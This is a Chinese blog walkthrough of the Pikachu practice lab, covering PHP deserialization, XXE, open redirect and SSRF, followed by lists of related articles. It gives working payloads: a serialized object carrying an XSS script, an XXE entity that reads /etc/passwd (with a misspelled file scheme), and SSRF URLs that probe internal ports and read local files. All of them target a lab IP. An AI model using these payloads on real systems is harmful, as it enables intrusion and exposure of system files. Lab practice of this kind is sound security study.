Pikachu靶场之PHP反序列化、XXE、URL重定向、SSRF漏洞

已于 2023-02-12 11:04:22 修改
阅读量168 收藏
点赞数
分类专栏: pikachu靶场 文章标签: pikachu pikachu靶场 pikachu 反序列化 pikachu xxe pikachu ssrf
于 2023-02-01 11:39:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44605964/article/details/128830503
版权

PHP反序列化漏洞

直接找个payload来用

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
//O:1 O代表object,1代表对象名字长度为1个字符
//S:1 S代表对象的名称,1代表对象里有1个变量
//s 数据类型,4 变量名称长度,test 变量名称

在这里插入图片描述

XXE

按照xml文档语法构造payload,读取passwd文件

<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "filD:///etc/passwd">
]>
<test>&xxe;</test>

在这里插入图片描述

URL重定向

不安全的url跳转

链接后带有url参数,修改url参数为跳转地址即可
在这里插入图片描述

要加http/https,添加url参数为想要跳转的网页

http://192.168.48.130/vul/urlredirect/urlredirect.php?url=http://www.baidu.com

在这里插入图片描述

发送后成功跳转
在这里插入图片描述

SSRF

SSRF(curl)

先开这句话,发现没有诗出来,看了下url好像有些问题,多了个/vul,删除后即可

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info1.php

在这里插入图片描述
在这里插入图片描述

可以通过修改url的参数来实现服务器对其他地址发起请求

访问pikachu服务器的其他端口/访问云服务器的22端口

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://192.168.48.130:82

http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://192.168.48.130:22

在这里插入图片描述
在这里插入图片描述

SSRF(file_get_content)

这个同样需要改下url才可以访问到内容
在这里插入图片描述

修改url直接访问目录,从 ‘file=’ 后开始

http://192.168.48.130/vul/ssrf/ssrf_fgc.php?file=///etc/passwd

在这里插入图片描述

Jach1n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
Pikachu靶场——PHP反序列化漏洞
来日可期的博客
09-30 1835
序列化是将对象转换为字节流或其他可传输格式的过程,以便将其存储在文件中、通过网络发送或在内存中保存。反序列化是将序列化的数据重新还原为对象的过程。反序列化漏洞通常出现在不正确或不安全的反序列化实现中。攻击者可以构造恶意的序列化数据,利用漏洞触发远程代码执行、拒绝服务攻击、信息泄露等安全问题。
pikachu PHP反序列化(皮卡丘漏洞平台通关系列)
箭雨镜屋
01-30 3787
诶嘿,又是一个简单的关卡 1、学习,学习一下 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有两个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而是类名称;同样的,O和S中间的1应该是类名字长度。 (2)几个魔法函数的举例有点让人误会,很容易误以为这些魔法函数都会造成反序列化漏洞,但其实__construct()在unserialize()时并不会被自动调用,这点在之后会进行演示。 总之,序列化是把对象转换为字符串,从而达到传输和存储的目的
Pikachu 靶场 PHP 反序列化漏洞通关解析
最新发布
Flag少侠的博客
05-17 2370
PHP反序列化漏洞是指在PHP应用程序中存在的安全漏洞,攻击者可以利用该漏洞通过精心构造的恶意序列化数据来执行恶意代码或实现未授权的操作。这种漏洞可能导致远程代码执行、敏感信息泄露、服务器拒绝服务等安全问题。PHP中的反序列化漏洞通常与序列化和反序列化功能相关。在PHP中,序列化是将对象或数据结构转换为可传输或存储的字符串的过程,而反序列化则是将这些字符串转换回原始对象或数据结构的过程。
【网络安全】反序列化漏洞
边缘拼命划水的小陈
04-27 225
在不可访问的属性上调用isset()或empty()触发。在不可访问的属性上使用unset()时触发。在对象上下文中调用不可访问的文件时触发。在静态上下文中调用不可访问的方法时触发。当脚本尝试将对象调用为函数时触发。用于从不可访问的属性读取数据。用于将数据写入不可访问的属性。
pikachu-php反序列化源码分析及修复
静水流深,沧笙踏歌
09-08 1390
在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。             序列化serialize()            ...
反序列化漏洞详解
qq_48904485的博客
03-21 3073
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
十、pikachuphp反序列化
qq_55202378的博客
08-24 966
pikachu php反序列化
通关pikachu靶场PHP反序列化漏洞
2301_79328240的博客
11-23 118
序列化:序列化是将对象转化为字符串流,利于对象的保存和传输反序列化反序列化就是将序列化后的字符串流还原回对象。
【web-ctf】ctf-pikachu-url重定向
一个努力生活的人的博客
08-23 1333
ctf-pikachu-url重定向
pikachu笔记之反序列化漏洞
weixin_53255260的博客
08-02 400
一、概述 在现有很多的应用当中,需要对某些对象进行序列化,让它们离开内存空间,入驻物理硬盘,以便可以长期保存,其中最常见的是Web服务器中的Session对象。对象的序列化一般有两种用途:把对象的字节序列永久地保存到硬盘上,通常存放在一个指定文件中;或者在网络上传送对象的字节序列。 而把字节序列恢复为对象的过程称为对象的反序列化。当两个进程在进行远程通信时,彼此可以发送各种类型的数据,而且无论是何种类型的数据,都会以二进制序列的形式在网络上传送。 未对用户输入的序列化字符串进行检测,导...
PHP反序列化漏洞原理(附带pikachu靶场演示)
m0_69043895的博客
04-18 1018
可以理解为程序在执行unserialize()函数是,自动执行了某些魔术方法(magic method),而魔术方法的参数被用户所控制(通过控制属性来控制参数),这就会产生安全问题。:也叫对象注入,就是当程序在进行反序列化时,会自动调用一些函数,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。要利用反序列化漏洞,必须向unserialize()函数传入构造的序列化数据(定义合适的属性值)。
pikachu靶场:php反序列化漏洞
一个努力学习网安的小牛马
11-27 768
另外,你也可以使用其他方法来处理序列化的数据,例如使用json_decode()函数将序列化的字符串转换为JSON格式的字符串,然后对JSON数据进行验证和处理。然而,如果序列化的数据中包含恶意代码,那么在反序列化时,这段恶意代码可能会被执行,从而带来安全风险。在这段代码中,通过POST请求接收一个序列化的字符串,并将其反序列化为一个S类的对象。如果这个序列化的字符串中包含恶意代码,那么在反序列化时,这段恶意代码可能会被执行,从而造成安全问题。的命名不够明确,不利于代码的可读性和可维护性。
Pikachu(皮卡丘)web漏洞练习平台记录(5)
SSDZLDL的博客
04-10 619
今天把皮卡丘弄完。
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值